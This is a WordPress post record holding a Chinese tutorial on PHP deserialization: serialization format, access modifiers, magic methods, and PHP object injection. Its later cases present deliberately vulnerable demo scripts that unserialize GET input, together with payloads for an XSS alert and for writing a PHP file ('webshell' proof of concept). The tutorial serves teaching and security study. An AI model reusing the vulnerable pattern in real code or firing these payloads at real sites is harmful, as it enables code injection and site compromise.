{"id":2144,"date":"2025-03-24T20:35:12","date_gmt":"2025-03-24T12:35:12","guid":{"rendered":"http:\/\/gzxingyu.cloud\/?p=2144"},"modified":"2025-03-24T20:35:13","modified_gmt":"2025-03-24T12:35:13","slug":"01-php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e5%9f%ba%e7%a1%80","status":"publish","type":"post","link":"http:\/\/gzxingyu.cloud\/index.php\/2025\/03\/24\/01-php%e5%8f%8d%e5%ba%8f%e5%88%97%e5%8c%96%e5%9f%ba%e7%a1%80\/","title":{"rendered":"01.PHP\u53cd\u5e8f\u5217\u5316\u57fa\u7840"},"content":{"rendered":"<h1>\u4e00\u3001\u5e8f\u5217\u5316\/\u53cd\u5e8f\u5217\u5316\u6280\u672f<\/h1>\n<p>\u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u8f6c\u4e3a\u5b57\u8282\u6d41\uff0c\u76ee\u7684\u662f\u65b9\u4fbf\u5bf9\u8c61\u5728\u5185\u5b58\u3001\u6587\u4ef6\u3001\u6570\u636e\u5e93\u6216\u8005\u7f51\u7edc\u4e4b\u95f4\u7684\u4f20\u9012<br \/>\n\u53cd\u5e8f\u5217\u5316\uff1a\u5e8f\u5217\u5316\u7684\u9006\u8fc7\u7a0b\uff0c\u5373\u5c06\u5b57\u8282\u6d41\u8f6c\u4e3a\u5bf9\u8c61\u7684\u8fc7\u7a0b\u3002<\/p>\n<p>\u5e8f\u5217\u5316\u5c31\u50cf\u628a\u684c\u5b50\u62c6\u9664\u8bb8\u591a\u96f6\u4ef6\uff0c\u53cd\u5e8f\u5217\u5316\u5c31\u662f\u5c06\u96f6\u4ef6\u7ec4\u88c5\u8d77\u6765<\/p>\n<h1>\u4e8c\u3001\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e<\/h1>\n<p>\u539f\u56e0\u662f\u7a0b\u5e8f\u6ca1\u6709\u5bf9\u7528\u6237\u8f93\u5165\u7684\u53cd\u5e8f\u5217\u5316\u5b57\u7b26\u4e32\u8fdb\u884c\u68c0\u6d4b\uff0c\u5bfc\u81f4\u53cd\u5e8f\u5217\u5316\u8fc7\u7a0b\u53ef\u4ee5\u88ab\u6076\u610f\u63a7\u5236\uff0c\u8fdb\u800c\u9020\u6210\u4ee3\u7801\u6267\u884c\u3001getshell\u7b49\u4e00\u7cfb\u5217\u4e0d\u53ef\u63a7\u7684\u540e\u679c\u3002<\/p>\n<p>\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u5e76\u4e0d\u662fPHP\u7279\u6709\uff0c\u4e5f\u5b58\u5728\u4e8eJava\u3001Python\u7b49\u8bed\u8a00\u4e4b\u4e2d\uff0c\u4f46\u5176\u539f\u7406\u57fa\u672c\u76f8\u901a\u3002<\/p>\n<h1>\u4e09\u3001PHP\u53cd\u5e8f\u5217\u5316<\/h1>\n<p>PHP\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\uff1a\u4e5f\u53ebPHP\u5bf9\u8c61\u6ce8\u5165\uff0c\u7a0b\u5e8f\u5728\u6267\u884cunserialize()\u51fd\u6570\u65f6\uff0c\u81ea\u52a8\u6267\u884c\u4e86\u67d0\u4e9b\u9b54\u672f\u65b9\u6cd5\uff08magic method\uff09\uff0c\u800c\u9b54\u672f\u65b9\u6cd5\u7684\u53c2\u6570\u88ab\u7528\u6237\u6240\u63a7\u5236\uff0c\u8fd9\u5c31\u4f1a\u4ea7\u751f\u5b89\u5168\u95ee\u9898\u3002<\/p>\n<p>\u6f0f\u6d1e\u5229\u7528\u6761\u4ef6\uff1a<\/p>\n<ol>\n<li>unserialize()\u51fd\u6570\u7684\u53c2\u6570\u53ef\u63a7\u3002<\/li>\n<li>\u5b58\u5728\u53ef\u5229\u7528\u7684\u9b54\u672f\u65b9\u6cd5\u3002<\/li>\n<\/ol>\n<h1>\u56db\u3001\u9762\u5411\u5bf9\u8c61<\/h1>\n<p>\u5c01\u88c5\uff1a<br \/>\n\u5c06\u4e00\u4e2a\u7c7b\u8fdb\u884c\u5c01\u88c5\uff0c\u7c7b\u4e2d\u6709\u5c5e\u6027\uff0c\u4ee5\u53ca\u884c\u4e3a\uff08\u6210\u5458\u51fd\u6570\uff09<\/p>\n<p>\u7ee7\u627f\uff1a<br \/>\n\u5b50\u7c7b\u4f1a\u7ee7\u627f\u7236\u7c7b\u7684\u5c5e\u6027\u4ee5\u53ca\u884c\u4e3a<\/p>\n<p>\u5b9e\u4f8b\u5316\uff1a<br \/>\n\u7c7b\u5b9e\u4f8b\u5316\u5c31\u6210\u4e3a\u4e86\u4e00\u4e2a\u5bf9\u8c61\uff0c\u5c31\u662f\u7c7b\u751f\u6210\u4e86\u4e00\u4e2a\u5177\u4f53\u7684\u5b9e\u4f8b<\/p>\n<h1>\u4e94\u3001\u5e8f\u5217\u5316<\/h1>\n<pre><code class=\"language-php\">&lt;?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n  public $name;\n  public $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n  $this-&gt;name = $name;\n  $this-&gt;age = $age;\n}\npublic function hello(){\n  echo &quot;Hello, my boy! \\n&quot;;\n  echo &quot;My name is $this-&gt;name, my age is $this-&gt;age !&quot;;\n  }\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = serialize($ryan);\necho $str;\n?&gt;\n<\/code><\/pre>\n<p>\u8f93\u51fa\u5185\u5bb9\uff1a<\/p>\n<pre><code>O:4:&quot;Girl&quot;:2:{s:4:&quot;name&quot;;s:6:&quot;\u5c0f\u7f8e&quot;;s:3:&quot;age&quot;;s:2:&quot;18&quot;;}\n<\/code><\/pre>\n<p>\u683c\u5f0f\u4e3a\uff1a<code>\u7c7b\u578b:\u957f\u5ea6:\u5185\u5bb9<\/code>\uff0c\u5982\uff1a<code>O:4:&quot;Girl&quot;<\/code><br \/>\n\u5e38\u89c1\u7684\u8868\u793a\u7c7b\u578b\u7684\u5b57\u7b26\uff1a<\/p>\n<pre><code>O:\u7c7b\na:\u6570\u7ec4(array)\nb:\u5e03\u5c14(boolean)\ni\u6574\u578b\nS:\u5b57\u7b26\u4e32\nN:Null\nd\uff1adouble\uff0c\u6d6e\u70b9\u578b\n<\/code><\/pre>\n<h1>\u516d\u3001\u53cd\u5e8f\u5217\u5316<\/h1>\n<pre><code>O:4:&quot;Girl&quot;:2:{s:4:&quot;name&quot;;s:6:&quot;\u5c0f\u7f8e&quot;;s:3:&quot;age&quot;;s:2:&quot;18&quot;;}\n<\/code><\/pre>\n<pre><code class=\"language-php\">&lt;?php\n\/\/\u5b9a\u4e49\u7c7b\nclass Girl{\n\/\/\u58f0\u660e\u5c5e\u6027\n\tpublic $name;\n\tpublic $age;\n\/\/\u58f0\u660e\u65b9\u6cd5\n\/\/__construct()\u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\npublic function __construct($name, $age){\n\t$this-&gt;name = $name;\n\t$this-&gt;age = $age;\n}\npublic function hello(){\n\techo &quot;Hello, my boy! \\n&quot;;\n\techo &quot;My name is $this-&gt;name, my age is $this-&gt;age !&quot;;\n\t}\n}\n\/\/\u7c7b\u5b9e\u4f8b\u5316\u6210\u4e3a\u5bf9\u8c61\n\/\/$ryan = new Girl('\u5c0f\u7f8e','18');\n$str = 'O:4:&quot;Girl&quot;:2:{s:4:&quot;name&quot;;s:6:&quot;\u5c0f\u7f8e&quot;;s:3:&quot;age&quot;;s:2:&quot;18&quot;;}';\n$obj = unserialize($str);\n$obj-&gt;hello();\n?&gt;\n<\/code><\/pre>\n<h1>\u4e03\u3001\u6848\u4f8b<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nheader(&quot;content-type:text\/html;charset=utf-8&quot;);\nshow_source(__FILE__);\nerror_reporting(0);\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0 \u00a0 public $age = 18;\n\u00a0 \u00a0 public function __construct($name,$age){\n\u00a0 \u00a0 \u00a0 \u00a0 $this-&gt;name = $name;\n\u00a0 \u00a0 \u00a0 \u00a0 $this-&gt;age = $age;\n\u00a0 \u00a0 \u00a0 \u00a0 }\n\u00a0 \u00a0 public function hello(){\n\u00a0 \u00a0 echo &quot;Hello,my boy!\\n&quot;;\n\u00a0 \u00a0 echo &quot;My name is $this-&gt;name, my age is $this-&gt;age !&quot;;\n\u00a0 \u00a0 }\n}\nif(isset($_GET['str' ])){\n$str = $_GET['str'];\n$object = unserialize($str);\n$object-&gt;hello();\n}\n?&gt;\n<\/code><\/pre>\n<p>\u5229\u7528\uff1axss<\/p>\n<pre><code>O:4:&quot;Girl&quot;:2:{s:4:&quot;name&quot;;s:29:&quot;&lt;script&gt;alert('xss')&lt;\/script&gt;&quot;;s:3:&quot;age&quot;;s:2:&quot;18&quot;;}\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323151602.png\" alt=\"Pasted image 20250323151602.png\"><\/p>\n<h1>\u516b\u3001\u8bbf\u95ee\u63a7\u5236\u7b26 public\\protected\\private<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nclass Girl{\n\tpublic $name = '\u5c0f\u7ea2';\n\tprotected $age = 18;\n\tprivate $money = 100.5;\npublic function __construct($name, $age,$money){\n\t$this-&gt;name = $name;\n\t$this-&gt;age = $age;\n\t$this-&gt;money = $money;\n}\npublic function hello(){\n\techo &quot;Hello, my boy! \\n&quot;;\n\techo &quot;My name is $this-&gt;name, my age is $this-&gt;age !&quot;;\n\techo &quot;I have $this-&gt;money RMB !&quot;;\n\t}\n}\n$ryan = new Girl(&quot;ryan&quot;,20,108.5);\necho serialize($ryan);\n?&gt;\n<\/code><\/pre>\n<p>\u5e8f\u5217\u5316\u540e\uff1a<\/p>\n<pre><code>O:4:&quot;Girl&quot;:3:{s:4:&quot;name&quot;;s:4:&quot;ryan&quot;;s:6:&quot;*age&quot;;i:20;s:11:&quot;Girlmoney&quot;;d:108.5;}\n<\/code><\/pre>\n<p>\u5bf9\u8c61\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u89c4\u5219\uff1a<\/p>\n<ul>\n<li>\n<p>var\u548cpublic\uff1avar\u548cpublic\u58f0\u660e\u7684\u5b57\u6bb5\u90fd\u662f\u516c\u5171\u5b57\u6bb5\uff0c\u56e0\u6b64\u4eec\u7684\u5b57\u6bb5\u540d\u7684\u5e8f\u5217\u5316\u683c\u5f0f\u662f\u76f8\u540c\u7684\uff0c\u5e8f\u5217\u5316\u540e\u7684\u5b57\u6bb5\u540d\u4e2d\u4e0d\u5305\u62ec\u58f0\u660e\u65f6\u7684\u53d8\u91cf\u524d\u7f00\u7b26\u53f7<\/p>\n<\/li>\n<li>\n<p>protected\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u4fdd\u62a4\u5b57\u6bb5\uff0c\u5728\u6240\u58f0\u660e\u7684\u7c7b\u548c\u8be5\u7c7b\u7684\u5b50\u7c7b\u4e2d\u53ef\u89c1\uff0c\u4f46\u5728\u8be5\u7c7b\u7684\u5bf9\u8c61\u5b9e\u4f8b\u4e2d\u4e0d\u53ef\u89c1\u3002\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a\\0*\\0\uff08\\0\u4e3a\u4e0d\u53ef\u89c1\u5b57\u7b26\uff09\u7684\u524d\u7f00\uff0c\u56e0\u6b64\u8be5\u5b57\u6bb5\u7684\u957f\u5ea6\u4f1a\u6bd4\u53ef\u89c1\u5b57\u7b26\u957f\u5ea6\u59273\u3002<\/p>\n<\/li>\n<li>\n<p>private\uff1a\u58f0\u660e\u7684\u5b57\u6bb5\u4e3a\u79c1\u6709\u5b57\u6bb5\uff0c\u53ea\u6709\u5728\u6240\u58f0\u660e\u7684\u7c7b\u4e2d\u53ef\u89c1\u3002\u540d\u5728\u5e8f\u5217\u5316\u65f6\uff0c\u5b57\u6bb5\u540d\u524d\u9762\u4f1a\u52a0\u4e0a<code>\\0&lt;\u58f0\u660e\u8be5\u79c1\u6709\u5b57\u6bb5\u7684\u7c7b\u7684\u7c7b\u540d&gt;\\0<\/code>\u524d\u7f00<\/p>\n<\/li>\n<\/ul>\n<h1>\u4e5d\u3001\u8bbf\u95ee\u63a7\u5236\u7b26\u7684\u53cd\u5e8f\u5217\u5316<\/h1>\n<pre><code class=\"language-php\">&lt;?php\nclass Girl{\n\u00a0 \u00a0 public $name = '\u5c0f\u7ea2';\n\u00a0   protected $age = 18;\n\u00a0 \u00a0 private $money = 100.5;\npublic function __construct($name, $age,$money){\n\u00a0 \u00a0 $this-&gt;name = $name;\n\u00a0 \u00a0 $this-&gt;age = $age;\n\u00a0 \u00a0 $this-&gt;money = $money;\n}\npublic function hello(){\n\u00a0 \u00a0 echo &quot;Hello, my boy! \\n&quot;;\n\u00a0 \u00a0 echo &quot;My name is $this-&gt;name, my age is $this-&gt;age !&quot;;\n\u00a0 \u00a0 echo &quot;I have $this-&gt;money RMB !&quot;;\n\u00a0 \u00a0 }\n}\n$str = 'O:4:&quot;Girl&quot;:3:{s:4:&quot;name&quot;;s:4:&quot;ryan&quot;;S:6:&quot;\\00*\\00age&quot;;i:20;S:11:&quot;\\00Girl\\00money&quot;;d:108.5;}';\n$o = unserialize($str);\n$o-&gt;hello();\n?&gt;\n<\/code><\/pre>\n<pre><code>O:4:&quot;Girl&quot;:3:{s:4:&quot;name&quot;;s:4:&quot;ryan&quot;;S:6:&quot;\\00*\\00age&quot;;i:20;S:11:&quot;\\00Girl\\00money&quot;;d:108.5;}\n<\/code><\/pre>\n<p>\u6ce8\u610f\uff1a  \u8981\u5c06\u5c0f\u5199\u7684s\u6539\u4e3a\u5927\u5199\u7684S\uff0c\\00\u66ff\u4ee3\u7a7a\u5b57\u7b26<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323155250.png\" alt=\"Pasted image 20250323155250.png\"><\/p>\n<h1>\u5341\u3001\u9b54\u672f\u65b9\u6cd5<\/h1>\n<p>\u9b54\u672f\u65b9\u6cd5\u662f\u4e00\u79cd\u7279\u6b8a\u7684\u65b9\u6cd5\uff0c\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u4f1a\u81ea\u52a8\u8c03\u7528\u3002\u9b54\u672f\u65b9\u6cd5\u7684\u547d\u540d\u662f\u4ee5\u4e24\u4e2a\u4e0b\u5212\u7ebf\u5f00\u5934\u7684\uff0c\u5e38\u89c1\u7684\u9b54\u672f\u65b9\u6cd5\u6709\uff1a<\/p>\n<pre><code>__construct()    \u5bf9\u8c61\u521b\u5efa(new)\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\n__destruct()     \u5bf9\u8c61\u88ab\u9500\u6bc1\u65f6\u89e6\u53d1\n__tostring()     \u628a\u5bf9\u8c61\u5f53\u4f5c\u5b57\u7b26\u4e32\u4f7f\u7528\u65f6\u89e6\u53d1\n__wakeup()       \u4f7f\u7528unserialize\u65f6\u89e6\u53d1\n__sleep()        \u4f7f\u7528serialize\u65f6\u89e6\u53d1\n__call()         \u5728\u5bf9\u8c61\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__callStatic()   \u5728\u9759\u6001\u4e0a\u4e0b\u6587\u4e2d\u8c03\u7528\u4e0d\u53ef\u8bbf\u95ee\u7684\u65b9\u6cd5\u65f6\u89e6\u53d1\n__get($key)      \u7528\u4e8e\u4ece\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u8bfb\u53d6\u6570\u636e,$key\u5c31\u662f\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\n__set()          \u7528\u4e8e\u5c06\u6570\u636e\u5199\u5165\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\n__isset()        \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u8c03\u7528isset()\u6216empty()\u89e6\u53d1\n__unset()        \u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset()\u65f6\u89e6\u53d1\n__clone()        \u5f53\u514b\u9686\u5bf9\u8c61\u662f\u8c03\u7528\n__invoke()       \u5f53\u811a\u672c\u5c1d\u8bd5\u5c06\u5bf9\u8c61\u8c03\u7528\u4e3a\u51fd\u6570\u65f6\u89e6\u53d1\n__autoload()     \u5728\u4ee3\u7801\u4e2d\u5f53\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u7c7b\u65f6\u4f1a\u81ea\u52a8\u8c03\u7528\u8be5\u65b9\u6cd5\n<\/code><\/pre>\n<h2>\u6848\u4f8b1.\uff1a<\/h2>\n<pre><code class=\"language-php\">&lt;?php\nheader(header:&quot;content-type:text\/html;charset=utf-8&quot;) ;\nclass Girl{\n\tpublic $name = &quot;\u5c0f\u82b1&quot;;\n\tpublic function __construct($name){\n\t\t$this-&gt;name = $name;\n\t\techo &quot;__construct: \u521b\u5efa\u5bf9\u8c61\u65f6\uff0ccreate object:$this-&gt;name \\n&quot;;\n\t}\n\tpublic function __destruct(){\n\t\techo &quot;__destruct\uff1a\u5bf9\u8c61\u9500\u6bc1\u65f6\uff0c$this-&gt;name is died \uff01\\n&quot;;\n\t}\n\tpublic function __call($name, $arguments){\n\t\techo&quot;__caLL\uff1a\u8c03\u7528\u4e0d\u5b58\u5728\u7684\u65b9\u6cd5\u65f6\\n&quot;;\n\t}\n\tpublic function __toString(){\n\t\treturn &quot;__toString\uff1a\u628a\u5bf9\u8c61\u5f53\u505a\u5b57\u7b26\u4e32\u8f93\u51fa\u65f6 \\n&quot;;\n\t}\n\tpublic function __clone(){\n\t\techo &quot;__clone\uff1a\u514b\u9686\u5bf9\u8c61\u65f6 \\n&quot;;\n\t}\n\tpublic function __get($name){\n\t\techo &quot;__get\uff1a\u8bfb\u53d6\u4e00\u4e2a\u4e0d\u5b58\u5728\u7684\u5c5e\u6027\u65f6 \\n&quot;;\n\t}\n\tpublic function _set($name,$value){\n\t\techo &quot;__set\uff1a\u8bbe\u7f6e\u4e0d\u5b58\u5728\u7684\u5c5e\u6027 \\n&quot;;\n\t}\n\tpublic function __isset($name){\n\t\techo &quot;__isset\uff1a\u5bf9\u4e0d\u53ef\u8bbf\u95ee\u5c5e\u6027\u8c03\u7528isset\uff08\uff09 \\n&quot;;\n\t}\n\tpublic function _unset($name){\n\t\techo &quot;__unset\uff1a\u5728\u4e0d\u53ef\u8bbf\u95ee\u7684\u5c5e\u6027\u4e0a\u4f7f\u7528unset\uff08\uff09\\n&quot;;\n\t}\n\tpublic function hello(){\n\t\techo &quot;My name is $this-&gt;name !\\n&quot;;\n\t}\n}\n$ryan = new Girl(&quot;Ryan&quot;);\n$ryan-&gt;hello();\n$ryan-&gt;a();\n$ryan-&gt;b;\n$r2 = clone $ryan;\necho $ryan;\n$r2-&gt;name = &quot;zs&quot;;\n$r2-&gt;abc =&quot;zs&quot;;\nisset($r2-&gt;abc);\nunset($r2-&gt;a);\n?&gt;\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323182044.png\" alt=\"Pasted image 20250323182044.png\"><\/p>\n<h2>\u6848\u4f8b2.\uff1a<\/h2>\n<pre><code class=\"language-php\">&lt;?php\nheader(&quot;content-type:text\/html;charset=utf-8&quot;);\nclass Girl{\n\tpublic $name = &quot;\u5c0f\u82b1&quot;;\n\tpublic function __construct($name){\n\t\t$this-&gt;name = $name;\n\t\techo &quot;__construct\uff1a \u521b\u5efa\u5bf9\u8c61\u65f6\uff0c create object:$this-&gt;name \\n&quot;;\n\t}\n\tpublic function __sleep(){\n\t\techo &quot;__sleep\uff1a\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n&quot;;\n\t\treturn array('name');\n\t}\n\tpublic function __wakeup(){\n\t\techo &quot;__wakeup\uff1a\u53cd\u5e8f\u5217\u5316\u65f6\u8c03\u7528\\n&quot;;\n\t}\n}\n$ryan = new Girl(&quot;Ryan&quot;);\n$r = serialize($ryan);\necho $r;\n$str ='O:4:&quot;Girl&quot;:1:{s:4:&quot;name&quot;;s:4:&quot;Ryan&quot;;}';\necho &quot;\\n&quot;;\nunserialize($str);\n?&gt;\n<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323183525.png\" alt=\"Pasted image 20250323183525.png\"><\/p>\n<h2>\u6848\u4f8b3.\uff1a<\/h2>\n<pre><code class=\"language-php\">&lt;?php\nheader(&quot;content-type:text\/html;charset=utf-8&quot;);\nhighlight_file(__FILE__);\nclass Girl{\n\tpublic $name = &quot;\u5c0f\u660e&quot;;\n\tpublic $file = &quot;a.txt&quot;;\n\tfunction __wakeup(){\n\t\t\t$file = fopen($this-&gt;file,'w');\n\t\t\tfwrite($file, $this-&gt;name);\n\t\t\tfclose($file);\n\t}\n}\necho &quot;&lt;h1&gt;\u53cd\u5e8f\u5217\u5316\u6f0f\u6d1e\u6848\u4f8b&lt;\/h1&gt;&quot;;\nif(isset($_GET[&quot;str&quot;])){\n\t$str = $_GET['str'];\n\t$o = unserialize($str);\n\techo &quot;name:&quot;.$o-&gt;name;\n}\n?&gt;\n<\/code><\/pre>\n<p>poc\u5199\u5165webshell:<\/p>\n<pre><code>O:4:&quot;Girl&quot;:2:{s:4:&quot;name&quot;;s:18:&quot;&lt;?php phpinfo();?&gt;&quot;;s:4:&quot;file&quot;;s:5:&quot;a.php&quot;;}\n<\/code><\/pre>\n<p>\u6267\u884cpoc\uff1a<br \/>\n<img decoding=\"async\" src=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323175004.png\" alt=\"Pasted image 20250323175004.png\"><\/p>\n<p>\u8bbf\u95eea.php\u6587\u4ef6\uff1a<br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323175056.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/gzxingyu.cloud\/wp-content\/uploads\/2025\/03\/Pasted-image-20250323175056.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"Pasted image 20250323175056.png\"><\/div><br \/>\n\u6210\u529f\u5199\u5165<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u4e00\u3001\u5e8f\u5217\u5316\/\u53cd\u5e8f\u5217\u5316\u6280\u672f \u5e8f\u5217\u5316\uff1a\u5c06\u5bf9\u8c61\u8f6c\u4e3a\u5b57\u8282\u6d41\uff0c\u76ee\u7684\u662f\u65b9\u4fbf\u5bf9\u8c61\u5728\u5185\u5b58\u3001\u6587\u4ef6\u3001\u6570\u636e\u5e93\u6216\u8005\u7f51\u7edc\u4e4b\u95f4\u7684\u4f20\u9012 \u53cd\u5e8f [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4,21],"tags":[],"class_list":["post-2144","post","type-post","status-publish","format-standard","hentry","category-web","category-21"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=2144"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions"}],"predecessor-version":[{"id":2145,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/2144\/revisions\/2145"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=2144"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=2144"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=2144"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}